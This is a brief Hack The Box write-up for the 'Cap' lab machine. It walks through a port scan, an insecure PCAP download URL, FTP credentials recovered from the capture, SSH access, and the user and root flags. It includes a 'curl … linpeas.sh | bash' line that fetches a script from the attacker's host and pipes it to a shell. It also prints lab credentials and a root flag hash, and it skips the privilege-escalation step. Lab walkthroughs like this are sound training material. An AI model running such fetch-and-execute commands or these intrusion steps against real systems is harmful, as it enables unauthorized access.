HTB

HTB: Cap

Machine IP: 10.10.10.245
Difficulty: Easy
OS: Linux


Step 1: Reconnaissance - Port Scanning

RustScan Results:

Nmap Detailed Scan:

PortServiceVersion
21/tcpFTPvsftpd 3.0.3
22/tcpSSHOpenSSH 8.2p1 Ubuntu
80/tcpHTTPGunicorn

Step 2: Web Enumeration

Website: http://10.10.10.245 - Security Dashboard The dashboard shows network packet data and has a Download feature.

Vulnerability Discovered:

The web app allows downloading packet capture (PCAP) files. By manipulating the URL, you can access sensitive files.

Example: http://10.10.10.245/data/0 - Downloaded 0.pcap

Step 3: FTP Credentials Discovery

Analyzing the downloaded PCAP file with Wireshark reveals:

Credentials Found:

  • Username: nathan
  • Password: Buck3t4TF0RM3!

Step 4: SSH Access

***Why not try FTP?

  • ***Because FTP doesn’t give you shell access
  • ***Because SSH is more powerful
  • ***Because SSH is easier to get root access

Why not use FTP?

  • No shell access, may be blocked by server configuration Why use SSH?
  • Shell access, command execution, privilege escalation possible

User Flag Location:

nathan@cap:~$ find / -name user.txt 2>/dev/null
/home/nathan/user.txt
nathan@cap:~$ cat /home/nathan/user.txt
[USER_FLAG_HERE]

Using LinPEAS

nathan@cap:~$ curl http://10.10.16.13/linpeas.sh | bash

Step 6: Root Flag

root@cap:~# cat /root/root.txt
2b9cca18ccf1ac2a9ab0329a9f8fc71b